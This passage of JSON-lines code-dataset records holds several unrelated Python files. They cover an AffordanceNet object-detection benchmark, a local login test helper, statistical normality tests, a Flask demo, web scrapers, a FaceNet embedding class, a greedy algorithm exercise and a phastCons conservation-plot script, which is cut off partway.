im_detect2(net, crop_img)\n else:\n 1\n\n # print \"rois_final: \", 
rois_final\n # print \"scores shape: \", scores.shape\n # print \"masks shape: \", masks.shape\n # print \"boxes shape: \", boxes.shape\n # print (\"rois_class_score: \", rois_class_score, rois_class_score.shape)\n # print (\"rois_class_ind: \", rois_class_ind, rois_class_ind.shape)\n \n assert rois_class_score.shape == rois_class_ind.shape\n\n # Use the bounding box with the largest score as the classification result.\n largest_cfd_idx = np.argmax(rois_class_score)\n # print \"largest_cfd_idx: \", largest_cfd_idx\n\n obj_cfd = rois_class_score[largest_cfd_idx][0]\n obj_classification_idx = rois_class_ind[largest_cfd_idx][0]\n\n # If there is no detection then the container cfd equals 0\n if rois_class_score[0][0] == -1:\n obj_iscontainer = False\n obj_container_cfd = 0.0\n # Nothing is detected\n bbox_score_list = []\n else:\n # Find the bounding box in scores\n largest_cfd_idx_in_score = np.where(scores==obj_cfd)\n print (\"largest_cfd_idx_in_score: \", largest_cfd_idx_in_score)\n # Make sure there is only one such box\n assert largest_cfd_idx_in_score[0].shape[0] == 1\n assert largest_cfd_idx_in_score[1].shape[0] == 1\n # Open container idx: bowl(1), cup(6), pan(3)\n if obj_classification_idx == 1 or obj_classification_idx == 3 or obj_classification_idx == 6:\n # print \"Object is classified as an open container\"\n obj_iscontainer = True\n else:\n obj_iscontainer = False\n \n bbox_score_list = scores[largest_cfd_idx_in_score[0][0],:]\n # print \"bbox_score_list sum: \", np.sum(bbox_score_list)\n bbox_container_score_list = np.array([bbox_score_list[1], bbox_score_list[3], bbox_score_list[6]])\n # print \"bbox_container_score_list: \", bbox_container_score_list\n obj_container_cfd = np.max(bbox_container_score_list)\n\n color_curr_mask, img_out, list_bboxes = visualize_mask(crop_img, rois_final, rois_class_score, rois_class_ind, masks, ori_height, ori_width, im_name, thresh=CONF_THRESHOLD)\n\n # print \"obj_iscontainer: \", obj_iscontainer\n # print 
\"obj_container_cfd: \", obj_container_cfd\n\n return obj_iscontainer, obj_container_cfd, color_curr_mask, img_out, list_bboxes, bbox_score_list, rois_class_score, rois_class_ind\n\n \n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(description='AffordanceNet demo')\n parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',\n default=0, type=int)\n parser.add_argument('--cpu', dest='cpu_mode',\n help='Use CPU mode (overrides --gpu)',\n action='store_true')\n\n args = parser.parse_args()\n\n return args\n\nif __name__ == '__main__':\n cfg.TEST.HAS_RPN = True # Use RPN for proposals\n\n args = parse_args()\n \n \n prototxt = root_path + '/models/pascal_voc/VGG16/faster_rcnn_end2end/test.prototxt'\n caffemodel = os.path.join(root_path, 'pretrained', 'AffordanceNet_200K.caffemodel') \n \n if not os.path.isfile(caffemodel):\n raise IOError(('{:s} not found.\\n').format(caffemodel))\n\n if args.cpu_mode:\n caffe.set_mode_cpu()\n else:\n caffe.set_mode_gpu()\n caffe.set_device(args.gpu_id)\n cfg.GPU_ID = args.gpu_id\n \n # load network\n net = caffe.Net(prototxt, caffemodel, caffe.TEST)\n print ('\\n\\nLoaded network {:s}'.format(caffemodel))\n\n map_dir = \"/home/hongtao/Dropbox/ICRA2021/affnet_benchmark/affnet_map_0726\"\n det_result_dir = \"/home/hongtao/Dropbox/ICRA2021/affnet_benchmark/affnet_map_result_0726\"\n\n # Class\n for class_folder in class_folders:\n class_dir = os.path.join(data_dir, class_folder)\n \n object_folders = os.listdir(class_dir)\n # object_folders = [\"Origami_Pink_Cup\"]\n\n benchmark_objdet_class_dir = os.path.join(det_result_dir, class_folder)\n if os.path.exists(benchmark_objdet_class_dir):\n pass\n else:\n os.mkdir(benchmark_objdet_class_dir)\n\n # Object\n for object_folder in object_folders:\n obj_dir = os.path.join(class_dir, object_folder)\n img_folder = obj_dir # the code needs this parameter to find the image \n img_files = os.listdir(obj_dir)\n \n 
benchmark_objdet_obj_dir = os.path.join(benchmark_objdet_class_dir, object_folder)\n if os.path.exists(benchmark_objdet_obj_dir):\n pass\n else:\n os.mkdir(benchmark_objdet_obj_dir)\n\n bbox_json = object_folder + \"_bbox.json\"\n json_path = os.path.join(obj_dir, bbox_json)\n rgbd_dir = os.path.join(obj_dir, 'rgbd')\n with open(json_path) as f:\n bbox_dict = json.load(f)\n img_num = 0\n total_img_num = 24\n for (key, value) in bbox_dict.items():\n img_num += 1\n img_name = value[\"filename\"]\n img = cv2.imread(os.path.join(rgbd_dir, img_name))\n\n print (object_folder)\n print (img_name)\n\n img_idx = img_name.split('.')[0]\n\n frame_map_dir = os.path.join(map_dir, img_idx)\n if not os.path.exists(frame_map_dir):\n os.mkdir(frame_map_dir)\n \n img_h = img.shape[0]\n img_w = img.shape[1]\n print (\"img_h, img_w: \", img_h, img_w)\n\n x = value[\"regions\"][0][\"shape_attributes\"][\"x\"]\n y = value[\"regions\"][0][\"shape_attributes\"][\"y\"]\n width = value[\"regions\"][0][\"shape_attributes\"][\"width\"]\n height = value[\"regions\"][0][\"shape_attributes\"][\"height\"]\n\n # print \"x, y: \", x, y\n # print \"width, height: \", width, height\n\n x_1 = max(0, x)\n y_1 = max(0, y)\n\n x_2 = min(x+width, img_w)\n y_2 = min(y+height, img_h)\n\n print (\"x1, x2, y1, y2: {}, {}, {}, {}\".format(x_1, x_2, y_1, y_2))\n crop_img = img[y_1:y_2, x_1:x_2]\n crop_img_name = img_name.split(\".\")[0] + \".crop.png\"\n crop_img_path = os.path.join(benchmark_objdet_obj_dir, crop_img_name)\n cv2.imwrite(crop_img_path, crop_img)\n\n im_name = img_name\n obj_iscontainer, obj_container_cfd, color_curr_mask, img_out, list_bboxes, bbox_score_list, rois_class_score, rois_class_ind = run_affordance_net_map_direct_crop(net, crop_img)\n \n # print \"obj_iscontainer: \", obj_iscontainer\n # print \"obj_container_cfd: \", obj_container_cfd\n \n obj_name = object_folder\n map_filename = obj_name + \".txt\"\n classification_filename = obj_name + \"_classification.txt\"\n map_path = 
os.path.join(frame_map_dir, map_filename)\n classification_path = os.path.join(frame_map_dir, classification_filename)\n with open(map_path, 'w') as f2:\n writerow = \"container \" + str(obj_container_cfd) + \" 0 1 2 3\" \n f2.write(writerow)\n with open(classification_path, 'w') as f3:\n if obj_iscontainer:\n writerow = \"container\"\n else:\n writerow = \"noncontainer\"\n f3.write(writerow)\n\n img_filename = img_name.split(\".\")[0]\n mask_filename = img_filename + \".mask.png\"\n mask_path = os.path.join(benchmark_objdet_obj_dir, mask_filename)\n cv2.imwrite(mask_path, color_curr_mask)\n objdet_filename = img_filename + \".objdet.png\"\n objdet_path = os.path.join(benchmark_objdet_obj_dir, objdet_filename)\n cv2.imwrite(objdet_path, img_out)\n\n # txt_file = img_filename + \"_running.txt\"\n # with open(os.path.join(benchmark_objdet_obj_dir, txt_file), 'a') as f1:\n # print (\"object folders: \", object_folders, file=f1)\n # print (\"rois_class_score: \", rois_class_score, file=f1)\n # print (\"rois_class_ind: \", rois_class_ind, file=f1)\n # for ab in list_bboxes:\n # print(\"box: \", ab, file=f1)\n # print (\"selected bbox score list: \", bbox_score_list, file=f1)\n # print (\"object container cfd: \", obj_container_cfd, file=f1)\n\n print (\"======\")\n \n assert img_num == total_img_num\n\n # for img_file in img_files:\n # print 'Current img: ', os.path.join(obj_dir, img_file)\n # img_idx = img_file.split('.')[0]\n\n # frame_map_dir = os.path.join(map_dir, img_idx)\n # if not os.path.exists(frame_map_dir):\n # os.mkdir(frame_map_dir)\n\n # im_name = img_file\n # obj_name = object_folder\n # obj_iscontainer, obj_container_cfd, color_curr_mask, img_out = run_affordance_net_map(net, im_name, obj_name)\n # print \"======\"\n # map_filename = obj_name + \".txt\"\n # map_path = os.path.join(frame_map_dir, map_filename)\n # with open(map_path, 'w') as f:\n # writerow = \"container \" + str(obj_container_cfd) + \" 0 1 2 3\" \n # f.write(writerow)\n\n # img_filename 
= img_file.split(\".\")[0]\n # mask_filename = img_filename + \".mask.png\"\n # mask_path = os.path.join(benchmark_objdet_obj_dir, mask_filename)\n # cv2.imwrite(mask_path, color_curr_mask)\n # objdet_filename = img_filename + \".objdet.png\"\n # objdet_path = os.path.join(benchmark_objdet_obj_dir, objdet_filename)\n # cv2.imwrite(objdet_path, img_out)\n \n \n\n \n \n \n\n\n","sub_path":"tools/affnet_map_benchmark_objdet.py","file_name":"affnet_map_benchmark_objdet.py","file_ext":"py","file_size_in_byte":22191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"536495872","text":"# -*- coding:utf-8 -*-\n# @Time:2020/7/28 9:21\n# @Author:martin\n# @File:login.py.py\n# import requests\n# s = requests.session()\n# 660B8D2D5359FF6F94F8D3345698F88C\n# host = 'http://192.168.138.128:8081/'\n\nclass Login_school(object):\n\n def __init__(self, s):\n self.s = s\n self.host = 'http://192.168.138.128:8081/'\n\n def login(self, usr, pwd):\n url = self.host + '/recruit.students/login/in'\n par = {\n \"account\": usr,\n \"pwd\": pwd\n }\n r = self.s.get(url=url, params=par)\n return r\n\nif __name__ == '__main__':\n import requests\n s = requests.session()\n l = Login_school(s)\n r =l.login(\"admin\", \"660B8D2D5359FF6F94F8D3345698F88C\")\n print(r.text)\n\n","sub_path":"python_script/interface/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"587284658","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 6 09:27:49 2021\r\n\r\n@author: Trần Thị Diệu Hiền\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.api as sm\r\nimport math\r\nimport numpy as np\r\nfrom scipy import stats\r\n\r\n\r\n\r\ndata = pd.read_csv(\"C:\\\\Users\\\\DUC-PC\\\\Downloads\\\\data.csv\")\r\nscreen = data['Screen Size']\r\nweight = data['Weight']\r\nbrightness = 
data[\"Brightness\"]\r\ndef hist_plot(data):\r\n mu = np.mean(data)\r\n sigma = np.std(data)\r\n x = np.linspace(mu - 3*sigma, mu + 3*sigma)\r\n plt.plot(x, stats.norm.pdf(x, mu, sigma), color = 'red')\r\n plt.hist(data, density=True, color = 'pink', edgecolor = 'red')\r\n plt.title(data.name)\r\n plt.show()\r\n\r\n \r\ndef qq_plot(data):\r\n sm.qqplot(data, line ='45', color = 'cyan')\r\n plt.show()\r\n \r\n\r\ndef bartlett(a, b, c):\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n print(\"Kiểm định Bartlett:\")\r\n stat, pvalue = stats.bartlett(a, b, c)\r\n print(\"Statistic =\", stat, \"\\n\",\r\n \"p value =\", pvalue)\r\n if pvalue > 0.05:\r\n print(\"Các features đồng nhất về phương sai\")\r\n else:\r\n print(\"Các features không đồng nhất về phương sai\")\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n \r\n \r\n\r\ndef levene(a, b, c):\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n print(\"Kiểm định Levene:\")\r\n stat, pvalue = stats.levene(a, b, c)\r\n if pvalue > 0.05:\r\n print(\"Các features đồng nhất về phương sai\")\r\n else:\r\n print(\"Các features không đồng nhất về phương sai\")\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n \r\n \r\ndef Shapiro(data):\r\n print(\"Kiểm định Shapiro -\", data.name)\r\n stat, pvalue = stats.shapiro(data)\r\n if pvalue > 0.05:\r\n print(\"Không thể bác bỏ giả thiết H0: Phân phối của dữ liệu là chuẩn\")\r\n else:\r\n print(\"Dữ liệu không tuân theo luật phân phối chuẩn\")\r\n print(\"------------------------------\")\r\n \r\n\r\ndef Kolmogorov(data):\r\n print(\"Kiểm định Kolmogorov -\", data.name)\r\n k, p = stats.kstest(rvs=data, cdf='norm', args=(np.mean(data), np.std(data)))\r\n if p > 0.05:\r\n print(\"Không thể bác bỏ giả thiết H0: Phân phối của dữ liệu là chuẩn\")\r\n else:\r\n print(\"Dữ liệu không tuân theo luật phân phối chuẩn\")\r\n print(\"------------------------------\")\r\n 
\r\n\r\nhist_plot(screen)\r\nhist_plot(weight)\r\nhist_plot(brightness)\r\nqq_plot(screen)\r\nqq_plot(weight)\r\nqq_plot(brightness)\r\nprint(bartlett(screen, weight, brightness))\r\nprint(Shapiro(screen))\r\nprint(Shapiro(weight))\r\nprint(Shapiro(brightness)) \r\nprint(levene(screen, weight, brightness))\r\nprint(Kolmogorov(screen))\r\nprint(Kolmogorov(weight))\r\nprint(Kolmogorov(brightness)) \r\n\r\n","sub_path":"BT_kiem_dinh.py","file_name":"BT_kiem_dinh.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214549860","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef user_info():\n user_info = (\n {'first_name': 'Michael', 'last_name': 'Choi'},\n {'first_name': 'John', 'last_name': 'Supsupin'},\n {'first_name': 'Mark', 'last_name': 'Guillen'},\n {'first_name': 'KB', 'last_name': 'Tonel'}\n )\n return render_template(\"table.html\", user = user_info)\n\nif __name__ == \"__main__\":\n app.run(debug = True)","sub_path":"HTML_table/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"290103754","text":"from bs4 import BeautifulSoup\nimport csv\nimport requests\nimport pandas as pd\n\nstart_url = \"https://en.wikipedia.org/wiki/List_of_brown_dwarfs\"\npage = requests.get(start_url)\nprint(page)\ndef scrape():\n headers = [\"Star\", \"Distance\", \"Mass\", \"Radius\"]\n star_data = []\n\n soup = BeautifulSoup(page.text, 'html.parser')\n\n star_table = soup.find('table')\n temp_list = []\n table_rows = star_table.find_all('tr')\n \n for tr in table_rows:\n td = tr.find_all('td')\n row = [i.text.rstrip() for i in td] \n temp_list.append(row)\n \n Star = []\n Distance =[]\n Mass = []\n Radius =[]\n\n for i in range(1,len(temp_list)):\n Star.append(temp_list[i][0]) \n Distance.append(temp_list[i][5])\n 
Mass.append(temp_list[i][7]) \n Radius.append(temp_list[i][8]) \n \n \n df2 = pd.DataFrame(list(zip(Star,Distance,Mass,Radius)),columns=['Star','Distance','Mass','Radius'])\n \n print(df2)\n\n df2.to_csv('brown_dwarfs.csv')\n\nscrape()\n","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"651685640","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\ndriver = webdriver.Chrome(\"c:/mychrome/chromedriver.exe\")\n# driver = webdriver.Chrome(\"c:/mychrome/chromedriver.exe\")\n\ndef insta_searching(word): # word 검색\n url = 'https://www.instagram.com/explore/tags/'+word\n return url\n \n \nword = '제주도맛집'\nurl = insta_searching(word)\n# print(url) # 본 url을 통해 스크래핑!\n# driver.get(url)\nfirst = driver.find_element_by_css_selector(\"div._9AhH0\") # 인스타 사진 클릭 후 내용까지 가지고 옴\nfirst.click()\ntime.sleep(2)\ndriver.page_source\n","sub_path":"DeepLearning_class/20.08.06/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"332331093","text":"import tensorflow as tf\nfrom scipy import misc\nfrom core import facenet\nimport numpy as np\nimport os\n\n\nclass Recognition(object):\n \"\"\"\n 人脸分类器,face classification,检测出128D的人脸识别landmarks,embedding\n \"\"\"\n\n # 会话\n _sess = None\n\n def __init__(self):\n\n tf.Graph().as_default()\n # 使用70%的GPU memory\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\n config = tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n\n self._sess = tf.Session(config=config)\n # Load the model\n facenet.load_model(os.path.join(os.path.abspath(\"\"), 'models/recognition/Casia-WebFace/20180619-160233.pb'))\n # Get input and output tensors\n self.images_placeholder = 
tf.get_default_graph().get_tensor_by_name(\"input:0\")\n self.embeddings = tf.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n self.phase_train_placeholder = tf.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n self.embedding_size = self.embeddings.get_shape()[1]\n\n def pre_process(self, imgs, image_size=160):\n \"\"\"\n @:brief 图像预处理\n :param imgs: 要预处理的图像list,可以处理多张图像\n :param image_size: 图像resize的大小\n :return: bool 返回预处理之后的图像list\n \"\"\"\n img_list = []\n for img in imgs:\n aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')\n prewhitened = facenet.prewhiten(aligned)\n img_list.append(prewhitened)\n images = np.stack(img_list)\n return images\n\n def forward(self, imgs):\n \"\"\"\n @brief:抽取图片特征\n :param imgs: 图片数据,是一个列表,可以出入多张图片\n :return:\n emb 抽取的特征向量,是一个列表\n \"\"\"\n images = self.pre_process(imgs, image_size=160)\n feed_dict = {self.images_placeholder: images, self.phase_train_placeholder: False}\n emb = self._sess.run(self.embeddings, feed_dict=feed_dict)\n return emb.tolist()\n\n def embedding(self, img):\n \"\"\"\n @brief:提取人脸图片特征点\n :param img: 图片数据\n :return:\n emb 抽取的特征向量,是一个列表\n \"\"\"\n images = self.pre_process([img], image_size=160)\n feed_dict = {self.images_placeholder: images, self.phase_train_placeholder: False}\n emb = self._sess.run(self.embeddings, feed_dict=feed_dict)\n return emb.tolist()[0]\n\n","sub_path":"SAFE_ICPMS/core/recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"549966182","text":"#참조 : https://blog.naver.com/ujafratte111/221762699717\n\ndef solution(number, k):\n stack = [number[0]]\n\n for num in number[1:]:\n while len(stack) > 0 and stack[-1] < num and k>0:\n k -=1\n stack.pop()\n stack.append(num)\n\n if k!= 0:\n stack = stack[:-k]\n\n\n answer = \"\".join(stack)\n return answer\n\nnumber = \"4177252841\"\nk = 
4\nprint(solution(number,k))","sub_path":"greedy/42883.py","file_name":"42883.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"152734140","text":"#!/usr/bin/env python\n\n\"\"\"\nTime-stamp: <2014-11-14 02:34:09 qqin>\n-d: input one merged Phastcon conservation bw file\n e.g. rsync -avz --progress rsync://hgdownload.soe.ucsc.edu/goldenPath/hg38/phastCons7way/hg38.phastCons7way.bw \n\"\"\"\n# ------------------------------------\n# python modules\n# ------------------------------------\n\nimport os\nimport sys\nimport re\nimport logging\nimport subprocess\nimport math\nimport numpy as np\nfrom optparse import OptionParser\nimport pyBigWig\n# try:\n# from bx.bbi.bigwig_file import BigWigFile\n# except:\n# sys.stderr.write(\"Need bx-python!\")\n# sys.exit()\n\n# ------------------------------------\n# constants\n# ------------------------------------\nlogging.basicConfig(level=20,\n format='%(levelname)-5s @ %(asctime)s: %(message)s ',\n datefmt='%a, %d %b %Y %H:%M:%S',\n stream=sys.stderr,\n filemode=\"w\"\n )\n#bigWigSummary = 'bigWigSummary'\n\n# ------------------------------------\n# Misc functions\n# ------------------------------------\n\nerror = logging.critical\t\t# function alias\nwarn = logging.warning\ndebug = logging.debug\ninfo = logging.info\n\nclass PeakIO:\n \"\"\"IO for peak region information.\n This class can hold peak information from MAT/MA2C/MACS, and\n provide some extra functions:\n 1. filtering functions, filter_pvalue/score/fdr/fold are functions\n to filter the peaks according to pvalue/score/fdr/fold range given\n by the user.\n 2. 
overlapping functions\n \"\"\"\n def __init__ (self, comment=\"\"):\n \"\"\"Initialization function.\n comment: you can add any comments to the peakIO object like\n whether or not it is from a ChIP-chip or a ChIP-seq\n experiments.\n \"\"\"\n self.peaks = {}\n self.comment = comment\n\n def dup (self):\n \"\"\"return a duplicate peakI.\n \"\"\"\n r = PeakIO(comment=self.comment)\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n for chrom in chrs:\n new_peaks[chrom]=[]\n new_peaks[chrom].extend(peaks[chrom])\n r.peaks = new_peaks\n return r\n\n\n def add (self, chromosome, start, end, summit=None,\n score=None, total_p=None,\n pvalue=None, fold_enrichment=None, fdr=None):\n \"\"\"Use this function to add items to PeakIO object.\n items: (peak start,peak end, peak length, peak summit, peak\n score, number of tags/probes in peak region, peak pvalue, peak\n fold_enrichment, fdr) <-- tuple type\n Parameters:\n 1. chromosome\n 2. start\n 3. end\n 4. summit: the highest position for the peak region\n 5. score: the score for peak region\n 6. total_p: total points in peak region. For ChIP-seq, it's\n how many tags in the region; for ChIP-chip, it's the number\n of probes.\n 7. pvalue: -10*log(10,p-value) for peak region\n 8. fold_enrichment: fold enrichment for the region\n 9. 
fdr: False Discovery Rate for the region\n \"\"\"\n if chromosome not in self.peaks:\n self.peaks[chromosome]=[]\n self.peaks[chromosome].append((start,end,end-start,summit,\n score,total_p,\n pvalue,fold_enrichment,fdr))\n\n def filter_pvalue (self, pvalue_cut_low, pvalue_cut_up=None ):\n \"\"\"Filter peaks in a given pvalue range.\n Note, pvalue is actually -10*log(10,pvalue)\n If pvalue_cut_low and pvalue_cut_up is assigned, the peaks with pvalue in [pvalue_cut_low,pvalue_cut_up).\n \"\"\"\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n if pvalue_cut_up:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[6] >= pvalue_cut_low and p[6]= pvalue_cut_low]\n if not new_peaks[chrom]: del new_peaks[chrom]\n self.peaks = new_peaks\n\n def filter_score (self, score_low, score_up=None ):\n \"\"\"Filter peaks in a given score range.\n If score_low and score_up is assigned, the peaks with score in [score_low,score_up).\n \"\"\"\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n if score_up:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[4] >= score_low and p[4]= score_low]\n if not new_peaks[chrom]: del new_peaks[chrom]\n self.peaks = new_peaks\n\n def filter_fold (self, fold_low, fold_up=None ):\n \"\"\"Filter peaks in a given fold enrichment range.\n If fold_low and fold_up is assigned, the peaks with fold in [fold_low,fold_up)\n \"\"\"\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n if fold_up:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[7] >= fold_low and p[7]= fold_low]\n if not new_peaks[chrom]: del new_peaks[chrom]\n self.peaks = new_peaks\n\n def filter_fdr (self, fdr_up, fdr_low=None ):\n \"\"\"Filter peaks in a given FDR range.\n If fdr_low and fdr_up is assigned, the peaks with fold in (fdr_low,fdr_up]. 
Otherwise, return the peaks with FDR lower or equal to fdr_up.\n \"\"\"\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n if fdr_low:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[8] > fdr_low and p[8]<=fdr_up]\n if not new_peaks[chrom]: del new_peaks[chrom]\n else:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[8] <= fdr_up]\n if not new_peaks[chrom]: del new_peaks[chrom]\n self.peaks = new_peaks\n\n def sort (self):\n peaks = self.peaks\n chrs = list(peaks.keys())\n chrs.sort()\n for chrom in chrs:\n peaks[chrom].sort(lambda x,y: cmp(x[0],y[0]))\n\n\n def get_chr_names (self):\n \"\"\"Return all the chromosome names stored.\n \"\"\"\n l = set(self.peaks.keys())\n return l\n\n\ndef cmp(a, b):\n return (a > b) - (a < b)\n\n\ndef parse_BED (fhd):\n \"\"\"Parse a tab-delimited bed file\n Return a PeakIO object containing peak regions.\n \"\"\"\n import subprocess\n peaks = PeakIO()\n n=0\n for thisline in fhd:\n n+=1\n if n>5000: ## use top 5000 peak\n break\n thisline = thisline.rstrip()\n if not thisline: continue #return (\"blank\",None,None)\n if thisline.startswith(\"#\"): continue #return (\"comment line\",None,None) # comment line is skipped\n if thisline.startswith(\"track\"): continue\n if thisline.startswith(\"browser\"): continue\n thisfields = thisline.split()\n startpos = max(0,int(thisfields[1]))\n\n peaks.add(thisfields[0],startpos,int(thisfields[2]),1,1,1,1,1,1)\n return peaks\n\ndef extract_phastcons ( bedfile, phasdb, width, pf_res ):\n \"\"\"Extract phastcons scores from a bed file.\n Return the average scores\n \"\"\"\n info(\"read bed file...\")\n bfhd = open(bedfile)\n bed = parse_BED(bfhd)\n bfhd.close()\n # calculate the middle point of bed regions then extend left and right by 1/2 width\n bchrs = list(bed.peaks.keys())\n bchrs.sort()\n\n sumscores = []\n bw = pyBigWig.open(phasdb)\n# info(bw.stats(\"chr1\",632029,636030,type=\"mean\",nBins=100))\n for chrom in 
bchrs:\n info(\"processing chromosome: %s\" % chrom)\n pchrom = bed.peaks[chrom]\n for i in range(len(pchrom)):\n mid = int((pchrom[i][0]+pchrom[i][1])/2)\n left = int(mid - width/2)\n right = int(mid + width/2)\n\n if left < 0:\n left = 0\n right = int(width)\n# info(type(chrom))\n info(\"%s:%s-%s\" % (chrom, left, right))\n try:\n summarize = bw.stats(chrom, left, right, type=\"mean\", nBins=int(width/pf_res))\n except RuntimeError:\n continue\n# dat = summarize.sum_data / summarize.valid_count\n sumscores.append(summarize)\n\n ## a list with each element is a list of conservation score at the same coordinate\n sumscores = list(map(list, list(zip(*sumscores))))\n\n ## exclude na\n sumscores = [[t2 for t2 in t if t2] for t in sumscores]\n try:\n conscores = [sum(t)/len(t) for t in sumscores]\n except ZeroDivisionError:\n conscores = [0] * (width/pf_res)\n info(conscores)\n return conscores\n\ndef makeBmpFile(avgValues, wd, outimg, h,w, width, pf_res, title, bedlabel):\n\n #creating R file in which to write the rscript which defines the correlation plot\n #create and save the file in the current working directory\n\n ## outimg should be id/prefix, that is, conf.prefix\n fileName = os.path.join(wd, os.path.basename(outimg))\n rFile = open(fileName+'.R','w')\n bmpname = fileName+'.png'\n rscript = 'sink(file=file(\"/dev/null\", \"w\"), type=\"message\")\\n'\n rscript += 'sink(file=file(\"/dev/null\", \"w\"), type=\"output\")\\n'\n # rscript += 'pdf(\"%s\",height=%d,width=%d)\\n' %(bmpname,h,w)\n xInfo = list(range(int(-width/2),int(width/2), int(pf_res)))\n rscript += 'x<-c('+','.join(map(str,xInfo[:-1]))+')\\n' # throw the last point which may be buggy\n for i in range(len(avgValues)):\n avgscores = avgValues[i]\n tmpname = 'y'+str(i)\n rscript += tmpname+'<-c('+','.join(map(str,avgscores[:-1]))+')\\n' # throw the last point which may be buggy\n\n tmplist = []\n for i in range(len(avgValues)):\n tmplist.append( \"y%d\" % i )\n\n rscript += \"ymax <- max(\"+ 
\",\".join(tmplist) +\")\\n\"\n rscript += \"ymin <- min(\"+ \",\".join(tmplist) +\")\\n\"\n rscript += \"yquart <- (ymax-ymin)/4\\n\"\n rscript += \"png(\\\"%s\\\",height=%d,width=%d, unit='in', res=300, bg=FALSE)\\n\" %(bmpname,h,w)\n rscript += 'plot(x,y0,type=\"l\",col=rainbow(%d)[1],main=\\\"%s\\\",xlab=\"Distance from the Center (bp)\",ylab=\"Average Phastcons\",ylim=c(ymin-yquart,ymax+yquart))\\n' % (len(avgValues),title)\n for i in range(1,len(avgValues)):\n rscript += 'lines(x,y'+str(i)+',col=rainbow(%d)[%d])\\n' % (len(avgValues),i+1)\n rscript += 'abline(v=0)\\n'\n # legend_list = map(lambda x:\"'\"+x+\"'\", bedlabel)\n # rscript += 'legend(\"topright\",c(%s),col=rainbow(%d),lty=c(%s))\\n' % (','.join(legend_list),len(avgValues),','.join(['1']*len(avgValues)))\n rscript += 'dev.off()\\n'\n\n _wh = 85\n thumbname = \"%s_thumb.png\" % fileName\n rscript += \"png(\\\"%s\\\",height=%d,width=%d, unit='px')\\n\" %(thumbname,_wh,_wh)\n rscript += \"par(mar=c(0,0,0,0))\\n\"\n rscript += \"plot(x,y0,type='l',col=rainbow(1)[1],bty='n', lwd=5, xaxs='i', yaxs='i', ann=FALSE, xaxt='n', yaxt='n', bty='n')\\n\"\n rscript += 'dev.off()\\n'\n\n rFile.write(rscript)\n rFile.close()\n #executing the R file and forming the pdf file\n data = subprocess.call(['Rscript',fileName+'.R'])\n\n# ------------------------------------\n# Main function\n# ------------------------------------\ndef main():\n usage = \"usage: %prog <-d path> [options] ...\"\n description = \"Draw conservation plot for many bed files.\"\n\n optparser = OptionParser(version=\"%prog 0.1\",description=description,usage=usage,add_help_option=False)\n optparser.add_option('-H','--height', dest='height',type='int',default=10, help=\"height of plot\")\n optparser.add_option('-W','--width',dest='width',type='int',default=10, help=\"width of plot\")\n optparser.add_option('-w',dest='w',type='int',default=1000, help=\"window width centered at middle of bed regions,default: 1000\")\n 
